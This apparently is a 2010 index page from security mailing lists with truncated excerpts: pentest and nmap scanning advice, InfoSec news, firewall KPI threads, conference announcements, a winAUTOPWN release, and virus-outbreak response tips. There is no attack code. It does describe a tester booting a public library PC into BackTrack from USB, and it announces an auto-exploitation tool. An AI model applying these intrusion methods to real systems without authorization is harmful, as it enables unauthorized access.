tested does some type of SYN-Flood-Protection, it will send SYN-ACK
packages without actually querying the host behind it (maybe adding
TCP-cookies).

By default NMAP will count SYN-ACK answers to SYN queries as open port.

Try running a connect scan (-sT) which runs through...

Re: Pentest - ISA server TAS (Aug 30)
Hi,

Having 50000 ports of the 65535 ports is highly unlikely. To me, the
result has high amount of false positive. To be really sure that the
ISA is exhibiting such a behavior, run nmap and wireshark and see to
it that the response is indeed coming from the ISA proxy and not from
any other device that is sitting in between your system and the ISA
proxy.

Hope that helps.

Cheers
TAS...

Re: Pentest - ISA server Ravipriya Thushara (Aug 30)
I too think there is an IPS at the network boundary other than an ISA
server. That's why it drops connections in both directions(IPS
inspects both inbound and outbound traffic). I'm interested in what
have over 50000 open ports. I have no idea about it and why is it
doing so.

------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and...

Re: Pentest - ISA server Paul Melson (Aug 30)
ISA Server is a proxy firewall, so TCP port scanning (3-way or SYN)
will result in lots of false positives like what you're seeing.
Libraries in the US are required to comply with CIPA, so the ISA
Server's primary purpose is most likely to filter adult web content.
It may also support remote access to the library's network, so rather
than trying to phone home from a compromised workstation (that is
probably turned off at close and rebooted...

Re: Pentest - ISA server Boyd, Chad (Aug 28)
Try scanning a Checkpoint 7.0+ system with the IPS blade running, and you're likely to see similar things.

------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT
and CEPT certs require a full practical examination in order to become...

Pentest - ISA server Kurt M. John (Aug 28)
Hey guys,

I have a question but I wanted to share this part with you first. I'm
doing a pentest for a client (scope includes several places including a
library) and its been all types of fun actually. Yesterday I posed as a
library patron. I went through about 3 library computers that all had
bios passwords on them but I finally found one that didn't. So I
rebooted the computer that had no bios password to backtrack(installed
on a usb key) and...

Re: WAF Testing..suggestions?? Dotzero (Aug 27)
Try waffit - http://code.google.com/p/waffit/source/checkout

------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT
and CEPT certs require a full practical examination in order to become certified.

http://www.iacertification.org...

RE: WAF Testing..suggestions?? DucNguyen (Aug 27)
Hi False,

attacks/suspicous traffic towards the weberver from my client?

==> You can generate traffic attacks by web assessment tools, recommend :
W3af, Websecurify, not recommend Acunetix because it fixed http header, WAF
so easy detect and block.

good to be the role of my test

You can try some images : OWASP Webgoat ; WebDojo ...

Search article of NSA : waf testing procedure .

-------------------------------------------
Regards,...

Info Security News — Carries news items (generally from mainstream sources) that relate to security.

Iran's Cyber Army Hacks 1, 000 US, British, French Gov't Websites InfoSec News (Aug 31)
http://english.farsnews.com/newstext.php?nn=8906081424

FARS News Agency
2010-08-30

TEHRAN (FNA)- An Iranian cyber group announced that it has hacked more
than 1,000 important governmental websites of the US, Britain and France
in protest at their support and financial aids to anti-Iran terrorist
groups.

"To commemorate the Day of Campaign against Terrorism and the martyrdom
anniversary of (former Iranian President Mohammad Ali)...

Darpa’s Star Hacker Looks to WikiLeak-Pr oof Pentagon InfoSec News (Aug 31)
http://www.wired.com/dangerroom/2010/08/darpas-star-hacker-looks-to-wikileak-proof-the-pentagon/

By Spencer Ackerman
Danger Room
Wired.com
August 31, 2010

Tomorrow's WikiLeakers may have to be sneakier than just dumping
military docs onto a Lady Gaga disc. The futurists at Darpa are working
on a project that would make it harder for troops to funnel classified
material to WikiLeaks -- or to foreign governments. And that means if
you work...

State retiree data breached InfoSec News (Aug 31)
http://www.delawareonline.com/article/20100831/NEWS02/8310324/State+retiree+data+breached

By J.L. MILLER
The News Journal
August 31, 2010

DOVER -- In a data breach that one security expert said could be worth
millions of dollars to scam artists, Aon Consulting, the state's
benefits consultant, inadvertently posted personal information of about
22,000 state retirees on the Web, potentially exposing them to identity
theft for the rest of...

HP Holds Navy Network 'Hostage' for $3.3 Billion InfoSec News (Aug 31)
http://www.wired.com/dangerroom/2010/08/hp-holds-navy-network-hostage/

By Noah Shachtman
Danger Room
Wired.com
August 31, 2010

Someday, somehow, the U.S. Navy would like to run its networks -- maybe
even own its computers again. After 10 years and nearly $10 billion,
many sailors are tired of leasing their PCs, and relying on a private
contractor to operate most of their data systems. Troops are sick of
getting stuck with inboxes that hold...

Focus on Secrecy Could Hamper Pentagon's Cybersecurity Plans InfoSec News (Aug 31)
http://threatpost.com/en_us/blogs/focus-secrecy-could-hamper-pentagons-cybersecurity-plans-083010

By Paul Roberts
Threatpost.com
08/30/2010

The former head of the Department of Homeland Security's Cyber Security
Division warns that the U.S. military's preoccupation with secrecy could
hamper efforts to get the upper hand in cyber security.

An article last week by the U.S Deputy Secretary of Defense put the U.S.
military's cybersecurity plans...

Obama to loosen rules on technology exports InfoSec News (Aug 31)
http://www.washingtonpost.com/wp-dyn/content/article/2010/08/30/AR2010083004278.html

By Howard Schneider
Washington Post Staff Writer
August 30, 2010

The Obama administration is overhauling the decades-old rules for the
export of sensitive military and other technology, jettisoning what
industry groups criticize as an antiquated "Cold War" set of regulations
for a more streamlined approach.

After a year-long review by officials at...

[Dataloss Weekly Summary] Week of Sunday, August 22, 2010 InfoSec News (Aug 31)
========================================================================

Open Security Foundation - DataLossDB Weekly Summary
Week of Sunday, August 22, 2010

5 Incidents Added.

========================================================================

DataLossDB is a research project aimed at documenting known and reported data loss incidents world-wide. The Open
Security Foundation asks for contributions of new incidents and new data for...

IT Security Unleashes Employee Complaints InfoSec News (Aug 31)
http://www.informationweek.com/news/security/client/showArticle.jhtml?articleID=227101732

By Mathew J. Schwartz
InformationWeek
August 30, 2010

For 12% of CIOs, hearing complaints from employees over IT security
measures -- specifically, limits on their access to certain types of
websites or networks while using the office network -- is a common
occurrence. Meanwhile, 29% of CIOs say such gripes are at least
"somewhat common."...

CALL FOR PARTICIPATION-3rd Summer School on Network and Information Security (NIS'10) InfoSec News (Aug 29)
Forwarded from: Ioannis Askoxylakis <asko (at) ics.forth.gr>

**************************************************************************

SINCERE APOLOGIES IF YOU RECEIVE MULTIPLE COPIES OF THIS ANNOUNCEMENT

***************************************************************************
CALL FOR PARTICIPATION
3rd Summer School on Network and Information Security (NIS'10)
Jointly organized by ENISA and FORTH
13-17...

Pentagon considers preemptive strikes as part of cyber-defense strategy InfoSec News (Aug 29)
http://www.washingtonpost.com/wp-dyn/content/article/2010/08/28/AR2010082803849.html

By Ellen Nakashima
Washington Post Staff Writer
August 28, 2010

The Pentagon is contemplating an aggressive approach to defending its
computer systems that includes preemptive actions such as knocking out
parts of an adversary's computer network overseas - but it is still
wrestling with how to pursue the strategy legally.

The department is developing a...

Audit finds computer misuse at state employment agency InfoSec News (Aug 29)
http://www.charlotteobserver.com/2010/08/27/1645949/audit-finds-computer-misuse-at.html

By Michael Biesecker
newsobserver.com
Aug. 27, 2010

RALEIGH - Employees at the state agency tasked with helping unemployed
North Carolinians find jobs were instead using their government
computers to play games and burn copies of bootleg DVDs, a state audit
shows.

The Office of the State Auditor launched the investigation at the
Employment Security...

New DDoS Botnet Hits Nearly 200 Websites InfoSec News (Aug 29)
http://www.darkreading.com/database_security/security/attacks/showArticle.jhtml?articleID=227100032

By Kelly Jackson Higgins
DarkReading
Aug 26, 2010

A new botnet built for knocking websites offline has attacked mostly
Chinese and some U.S. sites, according to researchers.

About 90 percent of the command and control servers running YoyoDdos,
the nickname given the botnet by researchers at Arbor Networks who have
been studying and tracking...

3 areas where FUD needs to stop InfoSec News (Aug 29)
http://www.csoonline.com/article/606263/3-areas-where-fud-needs-to-stop

By Joan Goodchild
Senior Editor
CSO
August 26, 2010

There is a new breed of animal appearing in the infosec community,
according to Dr. Jimmy Blake, chief security officer for Mimecast, a
cloud-services company based in London, and host of the blog Cloud
Computing and Bad Behavior. The new breed is what he calls the
"attention monger" (he actually used a more...

Linux Advisory Watch: August 27th, 2010 InfoSec News (Aug 29)
+----------------------------------------------------------------------+
| LinuxSecurity.com Linux Advisory Watch |
| August 27th, 2010 Volume 11, Number 35 |
| |
| Editorial Team: Dave Wreski <dwreski () linuxsecurity com> |
| Benjamin D. Thomas <bthomas () linuxsecurity...

Gareth Williams: 'backroom boy' spy was really a high-flier InfoSec News (Aug 29)
http://www.telegraph.co.uk/news/uknews/crime/7969595/Gareth-Williams-backroom-boy-spy-was-really-a-high-flier.html

By Gordon Thomas
Telegraph.co.uk
29 Aug 2010

The Government Communications Headquarters in Cheltenham is Britain's
last great secret. Now it is in the focus of intense speculation among
its stunned staff. Never before has one of their own been murdered. In
GCHQ's cafes, the seating area around the lawn at the core of the...

Firewall Wizards — Tips and tricks for firewall administrators

Online Binary Planting Exposure Test Lists (Sep 02)
ACROS Security has made the Online Binary Planting Exposure Test publicly accessible
for the benefit of all Windows users. This test should make it easy for users and
administrators to assess their exposure to binary planting attacks originating from
the Internet.

URL: http://www.binaryplanting.com/test.htm

Note that this test is NOT meant to answer whether you're vulnerable (at this point
where so many binary planting vulnerabilities exist out...

Re: UPnP part of attack surface ArkanoiD (Aug 31)
It was pretty obvious from the very beginning that UPnP is evil gaping hole.

:-)

And actually i've never seen a reason to keep it enabled.

UPnP part of attack surface travis+ml-firewalls (Aug 31)
http://it.slashdot.org/it/08/01/14/1319256.shtml

One reason I'm interested in an authenticated way to do firewall
rule changes with DFD...

Re: In search of Firewalls KPIs pkc_mls (Aug 31)
Le 8/12/2010 11:07 PM, saumitra prabhudesai a écrit :

Hi,

Can you please describe a little bit more what you plan to do, which
models are involved, which scenarios, etc ?

The KPI are the same for several firewall vendors : cpu, memory, number
of sessions, throughput, etc.

Re: a cutting-edge open-source network security project travis+ml-firewalls (Aug 21)
Let the heresy begin! ;-)

Well, I was thinking of packet scrubbing in particular, with min-ttl
restrictions, because that can wreak havoc with traceroute. Being
able to easily turn it off for an IP for a quick traceroute is handy.

Any good Boeing 747 can already get you where you need; why would
anyone be interested in a free solar-powered engine?

Also, not all adversaries are conducting network attacks; perhaps you
want to block people who...

Re: covert timing channel data travis+ml-firewalls (Aug 21)
This is my timing side-channel link collection:
http://www.subspacefield.org/security/security_concepts/index.html#tth_sEc31.2.4

I should probably break that section up into remote & local, but I'm
already 3 levels deep :-)

I'd definitely check out "remote timing attacks are practical", I think
that one has the most information for your case.

You might want to check out Bernstein's AES attacks, or a statistician,
to characterise...

Re: covert timing channel data Melissa Stockman (Aug 21)
Thanks Travis but again this is not the data that I'm looking for.

The timing attacks described in your link are based on a single malicious
entity extracting data from a non compromised system by looking at timing
information.

The type of covert channel that I'm simulating has two malicious entities (a
sender and a receiver). One residing on a higher level security system and
one residing on a lower level security system. The entity on the...

Ruxcon 2010 Final Call For Papers cfp (Aug 21)
RUXCON 2010 FINAL CALL FOR PAPERS

Ruxcon would like to announce the final call for papers for the sixth annual Ruxcon conference.

This year the conference will take place over the weekend of 20th and 21st of November.

Ruxcon will be held at CQ, Melbourne, Australia.

The deadline for submissions is the 10th of October.

What is Ruxcon?

Ruxcon is the premiere technical computer security conference within Australia. Ruxcon aspires to bring...

In search of Firewalls KPIs Marcin Antkiewicz (Aug 21)
Saumitra,

KPIs are metrics. Good metrics should be Specific, Measurable,
Actionable, Relevant, and Timely (SMART people call it).
A simple way of looking at firewall metrics is by placing them into
environmental,operational and strategic categories.

Environmental measurements deal with power/cooling consumption, rack
footprint, cabling/media, location, power sources, etc.

Operational stats deal with capacity
(disk/CPU/states/licenses/interface...

Re: In search of Firewalls KPIs saumitra prabhudesai (Aug 18)
Thank you very much Tim. I'll start with the following as of now.

Thanks,
Saumitra

--- On Tue, 17/8/10, Tim Eberhard <xmin0s () gmail com> wrote:

From: Tim Eberhard <xmin0s () gmail com>
Subject: Re: [fw-wiz] In search of Firewalls KPIs
To: "Firewall Wizards Security Mailing List" <firewall-wizards () listserv icsalabs com>
Date: Tuesday, 17 August, 2010, 9:18 AM

I would suggest monitoring the following:

Number of...

Re: In search of Firewalls KPIs Tim Eberhard (Aug 17)
I would suggest monitoring the following:

Number of total sessions
Session Ramp rate
CPU (Flow and task)
Interface stats
Policy drops/screen drops
Temperatures

Depending on the model (higher end boxes) you also might want to monitor the
'get asic d' command. Traffic types greatly impact the capacity of these
boxes.

I hope this helps.

-Tim Eberhard

In search of Firewalls KPIs saumitra prabhudesai (Aug 16)
Hi All,

I am in search of the essential KPIs to be monitored for Juniper Netscreen Firewalls. After the identification of these
KPIs, I want to go ahead for capacity planning & performance optimization of these firewalls. Any piece of advise will
help!

Thanks,
Saumitra

Re: Intranet or intranet? Gautier . Rich (Aug 06)
While I've always spelled it as Intranet everywhere I've written it - I am now completely convinced that I have been in
the wrong for many, many years.

It is an intranet - not The Intranet. If you want to name it - then you can capitalize it.....e.g. Behmnet

Rich Gautier
Sr. Product Architect
Kadix Systems
Office: 571-226-8828
Cell: 703-231-2156

From: firewall-wizards-bounces () listserv icsalabs com [mailto:firewall-wizards-bounces ()...

Re: Intranet or intranet? Brian Loe (Aug 06)
Depends on context. If you are writing "the intranet" that you would
not capitalize it. If, however, you are writing "Company ABC's
Intranet" then you would. The latter being a proper noun and such.

Re: Intranet or intranet? John Morrison (Aug 06)
Jeff,

The noun internet means a network of networks. It is a group of
connected networks - an internetwork. The I in IP standards for
internet. The capitalisation of Internet is used for THE Internet. It
is a proper noun in this case. (See -
http://www.webster-dictionary.org/definition/internet
Which says "Internet - (Note: capital "I"). The Internet is the
largest internet (with a small "i") in the world)

Following...

Web App Security — Provides insights on the unique challenges which make web applications notoriously hard to secure, as well as attack methods including SQL injection, cross-site scripting (XSS), cross-site request forgery, and more.

nullcon Goa dwitiya (2.0) Call For Papers nullcon (Sep 01)
nullcon Dwitiya (2.0)
The Jugaad(hacking) Conference

nullcon is an initiative by null - The open security community.

Website:
http://nullcon.net

Calling all Jugaadus(hackers)
It's the time of the year when we welcome research done by the
community as paper submissions for nullcon.
So, sip your coffee, dust your debuggers, fire your tools, challenge
your grey cells and shoot us an email.

Tracks:
---------------
- Bakkar: 1 Hr Talks
-...

Online Binary Planting Exposure Test ACROS Security Lists (Sep 01)
ACROS Security has made the Online Binary Planting Exposure Test publicly accessible
for the benefit of all Windows users. This test should make it easy for users and
administrators to assess their exposure to binary planting attacks originating from
the Internet.

URL: http://www.binaryplanting.com/test.htm

Note that this test is NOT meant to answer whether you're vulnerable (at this point
where so many binary planting vulnerabilities exist out...

[HITB-Announce] HITB2010 SIGNINT Sessions Hafez Kamal (Aug 26)
Hack In The Box is proud to announce, a brand new lightning session
called HITB SIGINT (Signal Intelligence/Interrupt)! HITB SIGINT
sessions are designed to provide a quick 15 minute overview for
material and research that's up and coming - stuff that isn't quite
ready for the mainstream tracks of the conference but deserve a mention
nonetheless. Final year students who want to present their projects to
industry experts are also strongly...

Released SpyBHORemover 2.5 Nagareshwar Talekar (Aug 25)
Hi all,

SpyBHORemover 2.5 is released to public now. SpyBHORemover (previously
called BHORemover) is the [FREEWARE] advanced tool to explore and
eliminate malicious BHO's from the system.

http://securityxploded.com/bhoremover.php

More about SpyBHORemover:
--------------------------------------------
BHO stands for 'Browser Helper Objects' which are plugins written for
'Internet Explorer' to enhance its capabilities. Often this...

t2′10 Challenge to be released 2010-08- 28 10:00 EEST Tomi Tuominen (Aug 24)
Hi,

Since the dawn of our species (well 2005, if you want to be picky about
it) t2 has been granting free admission to the elite of their kind, the
winners of the t2 Challenges. Don’t be suckered in by all the cheap
imitations out there, their snooze-fest la-di-da dog and pony shows,
because t2 is back! And we’re pleased to announce the release of the
t2’10 Challenge!

Now is your chance to join the past elites (http://t2.fi/challenge/) by...

[OWASP] APPSEC BRAZIL 2010 - REGISTRATIONS OPEN! Leonardo Buonsanti (Aug 20)
Greetings everyone!

We're proud to announce that the OWASP's AppSec Brazil 2010 Conference
registrations' are officially open!

Early bird offers are available! Hurry up!

This year we'll have keynotes by Robert 'Rsnake' Hansen and Jeremiah
Grossman and Samy Kamkar as a Special Speaker!

Registrations are available here:
http://www.owasp.org/index.php/AppSec_Brasil_2010#tab=Registration

All info about the event can be found at:...

Better Security Through Sacrificing Maidens Pete Herzog (Aug 19)
Hi,

I thought that this might be an interesting read for web developers.
It outlines a major problem with modern security practice and suggests
how to address it.

https://www.infosecisland.com/blogview/6646-Better-Security-Through-Sacrificing-Maidens.html

Sincerely,
-pete.

Ruxcon 2010 Final Call For Papers cfp (Aug 19)
RUXCON 2010 FINAL CALL FOR PAPERS

Ruxcon would like to announce the final call for papers for the sixth annual Ruxcon conference.

This year the conference will take place over the weekend of 20th and 21st of November.

Ruxcon will be held at CQ, Melbourne, Australia.

The deadline for submissions is the 10th of October.

What is Ruxcon?

Ruxcon is the premiere technical computer security conference within Australia. Ruxcon aspires to bring...

Re: winAUTOPWN v2.3 Released Brad Causey (Aug 11)
The comments are from folks that don't know what they are doing. My
understanding is that this tool isn't for newcomers to the security
realm, nor is the tool for script kiddies.
As with any open source security tool, use it with caution, and never
use anything you don't fully understand.

-Brad Causey
CISSP, MCSE, C|EH, CIFI, CGSP

http://www.owasp.org

Re: winAUTOPWN v2.3 Released ghost (Aug 11)
Damning how? It's obviously a script kiddie tool, so that leaves...

The genius that doesn't realize his AV is going off on the included
exploits and thinks its infected?

This list is sponsored by Cenzic
--------------------------------------
Let Us Hack You. Before Hackers Do!
It's Finally Here - The Cenzic Website HealthCheck. FREE.
Request Yours Now!
http://www.cenzic.com/2009HClaunch_Securityfocus
--------------------------------------

Re: winAUTOPWN v2.3 Released Jamie Riden (Aug 11)
Well, metasploit is "full of viruses" by that criterion as well - if
your AV tool doesn't moan about something like this then you need a
new AV tool :)

Having said that, I haven't downloaded it and tried it myself, but do
it on an isolated VM if you're worried.

cheers,
Jamie

Re: winAUTOPWN v2.3 Released Fred Concklin (Aug 09)
Comments prove to be damning.

http://www.darknet.org.uk/2009/04/winautopwn-windows-autohacking-tool/

"QUAKER DOOMER" <quakerdoomer () inbox lv> wrote:

winAUTOPWN v2.3 Released QUAKER DOOMER (Aug 08)
Dear all,

This is to announce release of winAUTOPWN version 2.3
This version covers remote exploits up-till July 2010.
A few web RFI exploits will be added in the next Unpolished Sita Release.
A complete list of all Exploits in winAUTOPWN is available in CHANGELOG.TXT

Also, in this version :
BSDAUTOPWN has been upgraded to version 1.1. This BSD equivalent for winAUTOPWN now contains
almost all exploits which exist in winAUTOPWN except for...

2nd. OWASP Ibero-American Web Applications Security Conference 2010 (IBWAS'10) - Call for Papers Carlos Serrão (Aug 02)
2nd. OWASP Ibero-American Web-Applications Security Conference 2010 (IBWAS’10)
ISCTE – Lisbon University Institute
25th – 26th November 2010
Lisboa, Portugal
http://www.ibwas.com

Call for Papers

Introduction
There is a change in the information systems development paradigm. The emergence of Web 2.0 technologies led to the
extensive deployment and use of web-based applications and web services as a way to developed new and flexible...

[HITB-Ann] Reminder: HITB2010 Malaysia Call for Papers Closing August 9th Hafez Kamal (Jul 29)
This is a reminder that the Call for Papers for Asia's largest network
security event, HITBSecConf2010 - Malaysia is closing on the 9th of August!

This will be a QUAD TRACK conference featuring 2 dedicated tracks
focusing on cutting edge attack and defense techniques, a track with
dedicated hands-on lab sessions and a brand new lightning talk segment!

HITB CFP: http://cfp.hackinthebox.org/

===

Venue: Crowne Plaza Mutiara Kuala Lumpur...

Daily Dave — This technical discussion list covers vulnerability research, exploit development, and security events/gossip. It was started by ImmunitySec founder Dave Aitel and many security luminaries participate. Many posts simply advertise Immunity products, but you can't really fault Dave for being self-promotional on a list named DailyDave.

nullcon Goa dwitiya (2.0) Call For Papers nullcon (Sep 02)
nullcon Dwitiya (2.0)
The Jugaad(hacking) Conference

nullcon is an initiative by null - The open security community.
(http://www.null.co.in)

Website:
http://nullcon.net

Calling all Jugaadus(hackers)
It's the time of the year when we welcome research done by the
community as paper submissions for nullcon.
So, sip your coffee, dust your debuggers, fire your tools, challenge
your grey cells and shoot us an email.

Tracks:
---------------
-...

Re: SELinux, was Re: X11 -> Root? (Qubes square rooted) travis+ml-dailydave (Sep 02)
Forgot a few, or rather neglected to mention them, because I have no
good response, and am acknowledging the argument by omitting a
response. I'm responding here in the interest of fairness:

Pro: MAC policies are complex because what you're trying to do is complex.
Anti: So you're saying MAC is complex because MAC is complex?
Pro: I guess so. ;-)

I don't have a good way to defend this, but it seems to me that, in
general, the more fine-grained...

Re: Commission on Cybersecurity for the 44th Presidency and your right to cyber (security) travis+ml-dailydave (Sep 02)
Summary:

Government: We need cyber-security, put out a contract for bids.
CompanyA: We can do it for $120k/seat.
CompanyB: We can do it for $100k/seat.
CompanyC: We can do it for $140k/seat.
Government: SELECT * FROM CONTRACTOR ORDER BY COST_PER_SEAT;
CompanyB: Find us the people who are arguably qualified, and
will work for a maximum of $50k, fill out an EPSQ,
submit to a SSBI, and whose poo doesn't stink.
Nobody...

SELinux, was Re: X11 -> Root? (Qubes square rooted) travis+ml-dailydave (Sep 02)
Okay, I'll feed him... ;-)

I'm the one who came forward a few years ago - not as saying SELinux
is a silver bullet - but rather that it's not entirely worthless (as
many curmudgeons would have you believe).

That you can defeat a kernel-level protection with a kernel-level
exploit isn't news. Saltzer & Schroeder pointed out that a
"supervisor program" must protect itself long ago. To reliably
enforce a protection mechanism, you...

Rooted CON 2011 - Call for Papers Román Ramírez (Sep 02)
Rooted CON 2011 - Call for Papers

-=] About Rooted CON

Rooted CON is a security congress which will be held in Madrid (Spain)
from 3 to 5 March 2011, whose spectrum of participants ranging from
students to state forces and secret services, through professionals of
the security market, lawyers, or even technology enthusiasts (and others).

-=] Type of Presentations

The congress accepts two kinds of presentations:

- Fast talks: 20 minutes.
-...

Re: Commission on Cybersecurity for the 44th Presidency and your right to cyber (security) Michal Zalewski (Sep 01)
Indeed. How about car analogies, though?

/mz

SILICAU Lightning Demo (Wireless key cracking) Mark Wuergler (Sep 01)
List,

Today's lightning demo will take a look at the wireless key cracking
capabilities of SILICAU.
Come watch us crack WEP, WPA1/2, and LEAP authentication!

Immunity will be doing a Lightning Demo today, Wednesday September 1st at
3:00p EDT (UTC - 4), we expect the demo to last between 15 and 20
minutes. Space is limited to 20 and invites will be issued on a first
come / first served basis. Invites for the demo will be sent at
approximately...

Re: Commission on Cybersecurity for the 44th Presidency and your right to cyber (security) Fyodor (Sep 01)
In China they've been pushing Multi-Level Protection Scheme (MLPS),
which is somewhat makes sense, when it is not at personal but at
enterprise level (i.e. you don't want your enemy country enterprises
to come and secure your critical infrastructure and plant backdoors as
they go :))

The comparison with medical industry is ridiculous. Not only the med.
industry doesn't serve its main purpose (healing), but there is also
one key difference: the...

Re: Commission on Cybersecurity for the 44th Presidency and your right to cyber (security) Michal Zalewski (Sep 01)
If you look at the archives of attrition.org, I actually suspect that
the charlatan fraction is about as strong as always, and not
particularly threatening to the legitimate business; and, given that,
as that report sensibly acknowledges, even fairly reputable
certifications do very little to generate highly qualified security
personnel, I doubt any action along these lines would make much of a
difference.

The real problem seems to be that the...

Re: Commission on Cybersecurity for the 44th Presidency and your right to cyber (security) Michal Zalewski (Sep 01)
Yeah, I remember that one.

Between this and the continued push for "private-public partnerships"
(i.e., companies letting the government assess their
cyber-preparedness, etc), I am getting vaguely uncomfortable with the
attention the industry is getting of recent - despite the fact that
little or nothing has changed in the last 5-6 years, too.

It's not as much that I suspect the government has questionable
motives, of course; this is...

Re: Commission on Cybersecurity for the 44th Presidency and your right to cyber (security) dan (Sep 01)
<disclaimer>I serve on that CSIS Commission</disclaimer>

Certification is coming, like it or not. I do not like it,
but it is coming. The driver is a direct consequence of,
and a direct confirmation that, the demand for security
expertise exceeds the supply which makes the charlatan
fraction rise especially as legal liability looks ever
more likely to be serious. Before we have a long-winded
argument, take a look at

www.nbise.org...

Commission on Cybersecurity for the 44th Presidency and your right to cyber (security) Michal Zalewski (Aug 31)
This is probably somewhat interesting; a prominent quote from this
paper, dissing security certifications, is making rounds for a while -
but the rest of the paper is actually pretty scary:

http://csis.org/files/publication/100720_Lewis_HumanCapital_WEB_BlkWhteVersion.pdf

In essence, looks like the commission is simultaneously trying to
criticize the current regime of security certifications (probably
rightly so), and - very bizarrely - use...

SILICAU Movie dave (Aug 26)
You can watch Mark Hijack a twitter/facebook session here.
http://partners.immunityinc.com/movies/Lightning_Demo_SilicaU_01.mp4

The key thing isn't really that this is possible (I assume if you're on this list you
know it is possible). The key thing is that it's two clicks.

-dave

Ekoparty classes! dave (Aug 25)
Immunity will be doing two classes at Ekoparty this September. You should sign up,
especially if you're going to go to Ekoparty (which you should)!

Breaking Windows
September 14th and 15th

Python for Hackers
September 13th and 14th

Realistically, both classes should be titled: "Things you should know that we had to
learn the hard way". That's what almost all classes at conferences should be titled,
except, in Ekoparty's case, in...

t2′10 Challenge to be released 2010 -08-28 10:00 EEST Tomi Tuominen (Aug 25)
Hi,

Since the dawn of our species (well 2005, if you want to be picky about
it) t2 has been granting free admission to the elite of their kind, the
winners of the t2 Challenges. Don’t be suckered in by all the cheap
imitations out there, their snooze-fest la-di-da dog and pony shows,
because t2 is back! And we’re pleased to announce the release of the
t2’10 Challenge!

Now is your chance to join the past elites (http://t2.fi/challenge/) by...

PaulDotCom — General discussion of security news, research, vulnerabilities, and the PaulDotCom Security Weekly podcast.

Re: LAN Virus outbreak Procedures d4ncingd4n (Sep 02)
If you know the name of the executable files, you may be able to use a software restriction policy in active directory
to kill or limit the virus.

Try to determine the infection mechanism. Don't forget to check any backup media, usb keys, etc to prevent
reinfection.

If you can isolate infected hosts as Russell mentioned, it will make it easier.

As far as prevention, make sure the users are running with least user privileges, remove...

Re: LAN Virus outbreak Procedures Tyler Robinson (Sep 02)
Thanks that is awesome advice I am starting thereand running ossim and
trying to analyze ya I could use 2 more people for sure but thanks everyone
again the advice given is invaluable keep any ideas coming I will be trying
a lot of things and hopefully can post what works and my experience to help
others .
TR

wrote:

at

configurations. I

lot

facebooking I

week

improvements! :)

Re: LAN Virus outbreak Procedures Chris Keladis (Sep 02)
Hey Tyler,

Ouch! Sounds like you need more hands and eyes on the problem :)

The only thing i can think of, bar running around to 350 PCs is maybe
sample a few to understand what malware you've got going on.

Make use of Microsoft's (ex-Sysinternals) tools to investigate.
AutoRuns, ProcExp, etc etc.

One handy tip when using ProcExp, dont "kill" malicious processes,
rather, "pause" or "freeze" them. Most malware...

Re: LAN Virus outbreak Procedures Tyler Robinson (Sep 02)
- I am working with several the most prominent being win32/afcore.nba
Trojan
- They seem to replicate to multiple machines at once from unknown origin

- about 60% conservativly so over a 100
- I have been back pedalling so hard I have not had time to packet
capture or even analyze
- Eset Nod32 v 4 Is our AV and it is catching and cleaning but it is
cleaning 10 or so every min which is hitting network performance a great...

OhioLinuxfest Sept 10-12, 2010 Dave (Sep 02)
Hi,
Just a reminder that http://www.ohiolinux.org/ is coming up in a Week!

Greater Columbus Convention Center
400 North High Street
Columbus, OH 43215

See ya there!

Dave

Re: LAN Virus outbreak Procedures Tyler Robinson (Sep 02)
Thanks everyone for all the ideas the enviroment has about 350 machines at
least all on flat domain can't vlan due to stupid software configurations. I
have several systems that have to be live all the time (911 systems) and
vmware esx servers in cluster. Any other suggestions is again so much
appreciated I am willing to try just about anything right now I have a lot
of angry users right now due to network performace ( for there facebooking I
am...

Re: LAN Virus outbreak Procedures Bill Swearingen (Sep 02)
forgot to add you need to identify the propagation method, and its potential
to infect other hosts. If it does do some sort of worm like activity, that
needs to be your first thing that you mitigate.

On Thu, Sep 2, 2010 at 2:17 PM, Bill Swearingen <hevnsnt () i-hacked com>wrote:

Re: LAN Virus outbreak Procedures Bill Swearingen (Sep 02)
Sounds like you need to take a quick step back and assess your position:

- What malware are you working with? (any details online?)
- What are its specific characteristics?
- How many potential machines?
- Does it phone home in any way?
- What tools/systems do you have in place that can *detect* an infected
system?
- What tools do you have that can clean an infected system?

Then design your incident response from there....

Re: LAN Virus outbreak Procedures Arch Angel (Sep 02)
Tyler,

I would not go crazy and start hardening PC's. I would get a system with a
few nic's and install something like OSSIM or even get a trial of Astaro
setup and then begin to trace it down. Begin by what systems are causing
the problems and then fix them one by one hardening then as you do them so
they don't get reinfected.

Just my thoughts others may have better ones :-)

Robert
(arch3angel)

end

nothing

Admin

first

community

Re: LAN Virus outbreak Procedures Craig Freyman (Sep 02)
How big is the environment?

On Thu, Sep 2, 2010 at 9:27 AM, Tyler Robinson <pcimpressions () gmail com>wrote:

Re: LAN Virus outbreak Procedures Pat (Sep 02)
I used a notable pen drive. Boot Linux install f-prot for Linux. Mount and
scan the drives. This works great on root kits

Hey everyone just wondering what kinds of procedures you are using to
prevent and stop virus outbreaks on your local network after some genius end
user investigates child porn on local network PCs. Do most of you use
microsofts firewall with GP and just open exceptions for the applicatoins
that need it or run another piece of...

Re: LAN Virus outbreak Procedures Butturini, Russell (Sep 02)
I've had much success with VLANing the affected systems off from the rest of the network and deploying some kind of
local "cleanup" machine that's hardened to work on the remediation process.

From: pauldotcom-bounces () mail pauldotcom com [mailto:pauldotcom-bounces () mail pauldotcom com] On Behalf Of Tyler
Robinson
Sent: Thursday, September 02, 2010 10:28 AM
To: PaulDotCom Security Weekly Mailing List
Subject: [Pauldotcom] LAN...

LAN Virus outbreak Procedures Tyler Robinson (Sep 02)
Hey everyone just wondering what kinds of procedures you are using to
prevent and stop virus outbreaks on your local network after some genius end
user investigates child porn on local network PCs. Do most of you use
microsofts firewall with GP and just open exceptions for the applicatoins
that need it or run another piece of software. I have a massive infection
that i cannot track down our Eset is catching them but my network is nothing
but...

Re: Brucon Robin Wood (Sep 02)
This is the one we all stayed at last year

http://www.husapresidentpark.com/

Not too far from station, ok bar, standard hotel prices. Quite nice
hotel unless you got the room where the bathroom flooded, can't
remember who got that one.

I'll be there for the VOIP class so see you there.

Robin

Brucon Nils (Sep 02)
Hi,
anyone going to Brucon and eventually to one of the classes prior?
Any hotel recommendations?
I'd like to go there the Tuesday prior to the class and check in late
